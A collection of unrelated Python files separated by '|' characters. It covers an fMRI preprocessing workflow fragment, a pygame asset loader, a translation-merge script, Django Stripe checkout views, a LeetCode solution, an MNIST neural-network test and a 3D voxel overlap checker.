(from_mcflirt, meanfunc, [('in_file','in_file')]),
(meanfunc, meanfuncmask, [('out_file','in_file')]),
(from_mcflirt,applyMask , [('in_file','in_file')]), # 1
(meanfuncmask, applyMask, [('mask_file','in_file2')]), # 2 output: 1&2, BET on coregistered fmri scan
(meanfunc, maskfunc4mean, [('out_file', 'in_file')]), # 3
(meanfuncmask, maskfunc4mean, [('mask_file','in_file2')]), # 4 output: 3&4, BET on mean func scan
(applyMask, save_file_list_in_brain, [('out_file', 'in_brain')]),
(applyMask, save_file_list_in_mask, [('out_file2', 'in_mask')]),
(save_file_list_in_brain, dataSink, [('out_brain','preprocessed_brain_paths.@out_brain1')]),
(save_file_list_in_mask, dataSink, [('out_mask','preprocessed_mask_paths.@out_mask')]),
(maskfunc4mean, wf_coreg_reg, [('out_file','func2anat_reg.in_file')]),
(applyMask, wf_coreg_reg, [('out_file', 'wf_motion_correction_bet_to_wf_confound_masks.reference_func_file_path')])
# -----------------------------------------------------------
# Connect maskfunc4mean node to FSL:FAST
# and extract the GM, WM and CSF masks.
# maskfunc4mean.out_brain is the scull stripped mean functional file of a subject in
# in the subject space after the fMRI file has been volume corrected or coregistered by mcflirt.
# Then save the masks and then save the file lists as well.
# -----------------------------------------------------------
])
infosource = Node(IdentityInterface(fields=['subject_id']),
name="infosource")
infosource.iterables = [('subject_id',subject_list)]
# Create the workflow
wf = Workflow(name=parent_wf_directory)
# base_dir = opj(s,'result')
wf.base_dir = base_directory # Dir where all the outputs will be stored(inside BETFlow folder).
# wf.connect([ (infosource, BIDSDataGrabber, [('subject_id','subject_id')]),
# (BIDSDataGrabber, extract, [('func_file_path','in_file')]),
#
# (BIDSDataGrabber,getMetadata, [('func_file_path','in_file')]),
#
# (getMetadata,slicetimer, [('tr','time_repetition')]),
#
#
# (getMetadata,slicetimer, [('index_dir','index_dir')]),
#
# (getMetadata,slicetimer, [('interleaved','interleaved')]),
#
# (getMetadata,save_file_list_in_tr, [('tr','in_tr')]),
#
# (extract,slicetimer,[('roi_file','in_file')]),
#
# (slicetimer, mcflirt,[('slice_time_corrected_file','in_file')])
# (mcflirt,dataSink,[('par_file','motion_params.@par_file')]), # saves the motion parameters calculated before
#
# (mcflirt,save_file_list_in_motion_params,[('par_file','in_motion_params')]),
#
# (mcflirt,wf_motion_correction_bet,[('out_file','from_mcflirt.in_file')])
# ])
# # Run it in parallel
# wf.run('MultiProc', plugin_args={'n_procs': num_proc})
#
#
#
# # Visualize the detailed graph
# # from IPython.display import Image
# wf.write_graph(graph2use='flat', format='png', simple_form=True)
# ANAT = 0
nodes = [extract, slicetimer,motionOutliers, mcflirt]
wf.connect(infosource,'subject_id', BIDSDataGrabber,'subject_id')
wf.connect(BIDSDataGrabber, 'func_file_path', getMetadata, 'in_file')
wf.connect(getMetadata, 'tr', save_file_list_in_tr,'in_tr')
wf.connect(save_file_list_in_tr,'out_tr', dataSink,'tr_paths.@out_tr')
old_node = BIDSDataGrabber
old_node_output = 'func_file_path'
for idx, include in enumerate(options_binary_string):
if old_node == extract :
old_node_output = 'roi_file'
elif old_node == slicetimer:
old_node_output = 'slice_time_corrected_file'
# elif old_node == mcflirt:
# old_node_output = 'out_file'
if int(include):
new_node = nodes[idx]
if new_node == slicetimer:
wf.connect(getMetadata,'tr',slicetimer,'time_repetition')
wf.connect(getMetadata,'index_dir',slicetimer, 'index_dir')
wf.connect(getMetadata,'interleaved',slicetimer,'interleaved')
new_node_input = 'in_file'
elif new_node == extract:
new_node_input = 'in_file'
elif new_node == mcflirt:
new_node_input = 'in_file'
wf.connect(mcflirt,'par_file',dataSink,'motion_params.@par_file') # saves the motion parameters calculated before
wf.connect(mcflirt,'par_file',
save_file_list_in_motion_params, 'in_motion_params')
wf.connect(save_file_list_in_motion_params, 'out_motion_params',
dataSink, 'motion_params_paths.@out_motion_params')
wf.connect(mcflirt, 'out_file',
wf_motion_correction_bet, 'from_mcflirt.in_file')
elif new_node == motionOutliers:
wf.connect(meanfuncmask, 'mask_file',
motionOutliers,'mask')
wf.connect(motionOutliers, 'out_file',
dataSink,'motionOutliers.@out_file')
wf.connect(motionOutliers, 'out_metric_plot',
dataSink,'motionOutliers.@out_metric_plot')
wf.connect(motionOutliers, 'out_metric_values',
dataSink,'motionOutliers.@out_metric_values')
wf.connect(motionOutliers, 'out_file',
save_file_list_in_motion_outliers,'in_motion_outliers')
wf.connect(
save_file_list_in_motion_outliers, 'out_motion_outliers',
dataSink, 'motion_outliers_paths.@out_motion_outliers')
new_node_input = 'in_file'
wf.connect(old_node, old_node_output, new_node, new_node_input)
continue
wf.connect(old_node, old_node_output, new_node, new_node_input)
old_node = new_node
else:
if idx == 3: # If No Node is attached till the end
# new_node = from_mcflirt
# new_node_input = 'from_mcflirt.in_file'
wf.connect(old_node, old_node_output, wf_motion_correction_bet,'from_mcflirt.in_file')
# old_node = new_node
TEMP_DIR_FOR_STORAGE = opj(base_directory,'crash_files')
wf.config = {"execution": {"crashdump_dir": TEMP_DIR_FOR_STORAGE}}
# Visualize the detailed graph
# from IPython.display import Image
wf.write_graph(graph2use='flat', format='png', simple_form=True)
# Run it in parallel
wf.run('MultiProc', plugin_args={'n_procs': num_proc})
|
import os, sys, pygame
from pygame.locals import *
def load_image(fileName, colorkey=None):
image = pygame.image.load(fileName).convert()
if colorkey is not None:
if colorkey == -1:
colorkey = image.get_at((0,0)) # set colorkey to top-left pixel of image
image.set_colorkey(colorkey, RLEACCEL)
return image, image.get_rect() # return the image and the hitbox
def load_sound(fileName):
sound = pygame.mixer.Sound(fileName)
return sound
|
#!/usr/bin/env python
import os
import polib
LOCALES = [
"br",
"cs",
"de",
"el",
"es",
"fi",
"fr",
"it",
"ja",
"nl",
"pt",
"pt-br",
"pl",
"po",
"ru",
"sv",
"tr",
"zh-hant",
]
OLD_TRANSLATION_MODULES = [
"",
"admin",
"dnstools",
"ldapsync",
"limits",
"maillog",
"policyd",
"relaydomains",
"transport",
"dmarc",
]
def merge_translations():
for locale in LOCALES:
target = f"locale/{locale}/LC_MESSAGES/app.po"
print(f"Opening {target}")
new_po = polib.pofile(target)
for module in OLD_TRANSLATION_MODULES:
prefix = f"../modoboa/{module}" if module else "../modoboa"
old_file = f"{prefix}/locale/{locale}/LC_MESSAGES/django.po"
if not os.path.exists(old_file):
continue
print(f"Opening {old_file}")
old_po = polib.pofile(old_file)
for entry in new_po:
old_entry = old_po.find(entry.msgid)
if old_entry:
entry.msgstr = old_entry.msgstr
new_po.save()
if __name__ == "__main__":
merge_translations()
|
from django.shortcuts import render
from django.conf import settings
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
import stripe
from users.models import Order
@csrf_exempt
def stripe_config(request):
if request.method == 'GET':
stripe_config = {'publicKey': settings.STRIPE_PUBLISHABLE_KEY}
return JsonResponse(stripe_config, safe=False)
def create_checkout_session(request):
items_to_purchase = []
if request.user.is_authenticated:
for order_item in request.user.order.item.all():
item = {
'name': order_item.product.name,
'quantity': order_item.quantity,
'currency': 'cad',
'amount': order_item.product.serialized_price.replace('.', ''),
}
items_to_purchase.append(item)
else:
if 'cart' in request.session:
for key, order_item in request.session['cart'].items():
item = {
'name': order_item['product']['name'],
'quantity': order_item['quantity'],
'currency': 'cad',
'amount': order_item['product']['price'].replace('.', ''),
}
items_to_purchase.append(item)
if request.method == 'GET':
domain_url = 'https://lit-peak-45044.herokuapp.com'
stripe.api_key = settings.STRIPE_SECRET_KEY
try:
checkout_session = stripe.checkout.Session.create(
success_url=domain_url + 'payment/success?session_id={CHECKOUT_SESSION_ID}',
cancel_url=domain_url + 'payment/cancelled/',
payment_method_types=['card'],
mode='payment',
line_items=items_to_purchase
)
return JsonResponse({'sessionId': checkout_session['id']})
except Exception as e:
return JsonResponse({'error': str(e)})
def success(request):
user = request.user
if user.is_authenticated:
order = Order.objects.get(user=user)
order.completed = True
user.order.delete()
user.order = Order.objects.create(user=user)
else:
request.session['cart'] = {}
return render(request, 'payments/success.html')
def cancelled(request):
return render(request, 'payments/cancelled.html')
|
# -*- coding: utf-8 -*-
class Solution:
def minCostToMoveChips(self, chips):
count_even, count_odd = 0, 0
for chip in chips:
if chip % 2 == 0:
count_even += 1
else:
count_odd += 1
return min(count_even, count_odd)
if __name__ == "__main__":
solution = Solution()
assert 1 == solution.minCostToMoveChips([1, 2, 3])
assert 2 == solution.minCostToMoveChips([2, 2, 2, 3, 3])
|
"""
This is the file where I'll use everything I built to create a NN to do something (idk atm)
"""
from NeuralNetwork import *
import numpy as np
import matplotlib.pyplot as plt
from Layer import *
from keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape((-1, 784))/255
x_test = x_test.reshape((-1, 784))/255
def categorize(j):
a = np.zeros((10, 1))
a[j] = 1
return a
y = []
for j in y_train:
y.append(categorize(j))
train = list(zip(x_train, y))
test = list(zip(x_test, y_test))
epochs = 20
alpha = 0.1
batch_size = 32
t = NeuralNetworkModel(784, 10)
t.add(Dense(64, "sigmoid"))
t.add(Dense(10, "sigmoid"))
# t.train(train, epochs, alpha, batch_size, test) # training the NN
# t.save("modeltest.txt")
""" Testing the save/load functions"""
n = NeuralNetworkModel(784, 10)
n.load("modeltest.txt")
result = 0
for x, y in test:
output = n.feedforward(x)
result += int(np.argmax(output) == y)
print("Accuracy: {0}".format(result / len(test) * 100))
""" The Results after running the NN:
On my laptop, with the above structure:
Epoch 1: 1716 / 10000
Epoch 2: 2849 / 10000
Epoch 3: 3964 / 10000
Epoch 4: 4184 / 10000
Epoch 5: 4299 / 10000
Epoch 6: 4606 / 10000
Epoch 7: 4968 / 10000
Epoch 8: 5094 / 10000
Epoch 9: 5160 / 10000
Epoch 10: 5205 / 10000
Epoch 11: 5243 / 10000
Epoch 12: 5276 / 10000
Epoch 13: 5303 / 10000
Epoch 14: 5317 / 10000
Epoch 15: 5330 / 10000
Epoch 16: 5339 / 10000
Epoch 17: 5350 / 10000
Epoch 18: 5358 / 10000
Epoch 19: 5366 / 10000
Epoch 20: 5373 / 10000
Process finished with exit code 0
In colab, with relu and sigmoid, 20 epochs
Epoch 1: 2588 / 10000
Epoch 2: 3056 / 10000
Epoch 3: 3530 / 10000
Epoch 4: 3880 / 10000
Epoch 5: 4169 / 10000
Epoch 6: 4359 / 10000
Epoch 7: 4556 / 10000
Epoch 8: 4716 / 10000
Epoch 9: 4866 / 10000
Epoch 10: 4992 / 10000
Epoch 11: 5103 / 10000
Epoch 12: 5231 / 10000
Epoch 13: 5334 / 10000
Epoch 14: 5446 / 10000
Epoch 15: 5545 / 10000
Epoch 16: 5649 / 10000
Epoch 17: 5772 / 10000
Epoch 18: 5884 / 10000
Epoch 19: 5990 / 10000
Epoch 20: 6103 / 10000
"""
|
from ddd.painter2 import *
from ddd.bresenham3 import *
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
tree = Vine()
paint = Painter(tree)
paint.build_tree_set()
branches = paint.build_tree_set()
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection='3d')
ax.set_xlim(-100, 100)
ax.set_ylim(-100, 100)
ax.set_zlim(0, 200)
plt.xlabel('x')
plt.ylabel('y')
list=[]
count = 0
for branch in branches:
start = branch.start_point
end = branch.end_point
x = [start[0], end[0]]
y = [start[1], end[1]]
z = [start[2], end[2]]
#print(start[0],start[1],start[2])
#print(end[0],end[1],end[2])
point1=(int(start[0]),int(start[1]),int(start[2]))
point2=(int(end[0]),int(end[1]),int(end[2]))
cube_list=bresenham(point1, point2)
#print(cube_list)
for i in cube_list:
if i in list:
print("重合的方块是:")
print(i)
print("重合的坐标点是:")
print(point1,point2)
else:
list.append(i)
count+=1
if count!=len(cube_list):
print("该规则不合法")
print(list)
print(len(list))
#figure = ax.plot(x, y, z, c='r')
#plt.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.